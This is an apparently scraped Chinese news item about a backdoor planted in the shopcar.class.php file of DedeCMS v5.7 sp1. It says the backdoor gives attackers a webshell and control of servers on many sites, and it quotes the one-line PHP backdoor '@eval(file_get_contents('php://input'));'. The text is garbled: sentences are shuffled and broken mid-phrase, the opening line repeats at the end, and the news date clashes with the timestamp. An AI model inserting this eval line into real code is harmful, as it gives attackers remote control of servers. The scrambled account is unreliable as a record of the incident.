DoNews 3月22日消息 据消息人士对DoNews透露
时间:2016-09-25 13:06:15
作者:采集侠
来源:网络整理
织梦CMS(Dedecms)v5.7 sp1版本的中的shopcar。class。php文件被植入一句后门代码,通过利用这个后门,黑客只需要构造简单的数据包提交到服务器,就能够获取到
通过对服务器进一步渗透攻击,PHP开源网站管理系统织梦CMS(DedeCms)v5.7 sp1版本被植入后门,目前约有70万网站使用该系统搭建,(完) , 据悉,通过利用该后门,织梦CMS(Dedecms)v5.7 sp1版本的中的shopcar,进而获取服务器的最高权限,涉及企业、政府机关、媒体机构、行业及个人网站等,class,就能获取到该网站的WebShell,黑客只需构造简单的数据包提交到服务器。
获取存储在服务器上的文件和数据库。
php文件被植入一句后门代码“@eval(file_get_contents(‘php://input’));”, 织梦CMS漏洞示意图 另据CMS官方数据显示, DoNews 3月22日消息 据消息人士对DoNews透露,黑客可通过此后门直接获得网站的控制权限。
